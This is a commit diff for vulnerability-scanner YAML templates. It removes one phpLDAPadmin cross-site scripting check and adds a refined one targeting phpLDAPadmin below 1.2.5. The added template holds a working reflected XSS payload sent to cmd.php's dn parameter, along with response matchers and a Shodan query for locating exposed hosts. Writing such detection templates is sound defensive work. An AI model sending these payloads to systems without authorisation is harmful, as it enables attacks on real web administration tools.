complete template update

custom-phpldapadmin-xss

@@ -1,16 +0,0 @@
-id: custom-phpldapadmin-xss
-info:
-  name: Custom PHP LDAP Admin XSS Detection
-  author: GodfatherOrwa, herry
-  Reference : https://twitter.com/GodfatherOrwa/status/1701392754251563477
-  severity: medium
-
-http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/phpldapadmin/cmd.php?cmd=template_engine&dn=%27%22()%26%25%3Czzz%3E%3CScRiPt%20%3Ealert(%27Orwa%27)%3C/ScRiPt%3E&meth=ajax&server_id=1"
-    matchers:
-      - type: word
-        words:
-          - "<ScRiPt >alert('Orwa')</ScRiPt>"
-        part: body

http/vulnerabilities/other/phpldapadmin-xss.yaml

@@ -0,0 +1,47 @@
+id: phpldapadmin-xss
+
+info:
+  name: PHP LDAP Admin < 1.2.5 - Cross-Site Scripting
+  author: GodfatherOrwa,herry
+  severity: medium
+  reference:
+    - https://twitter.com/GodfatherOrwa/status/1701392754251563477
+  metadata:
+    max-request: 3
+    verified: true
+    shodan-query: html:"phpLDAPadmin"
+  tags: php,phpldapadmin,xss
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+      - "{{BaseURL}}{{path}}/cmd.php?cmd=template_engine&dn=%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&meth=ajax&server_id=1"
+      - "{{BaseURL}}{{path}}/index.php?redirect=true&meth=ajax"
+
+    attack: pitchfork
+    payloads:
+      path:
+        - 
+        - /htdocs/index.php
+        - /phpldapadmin
+
+    stop-at-first-match: true
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<script>alert(document.domain)</script>"
+          - "No such entry"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200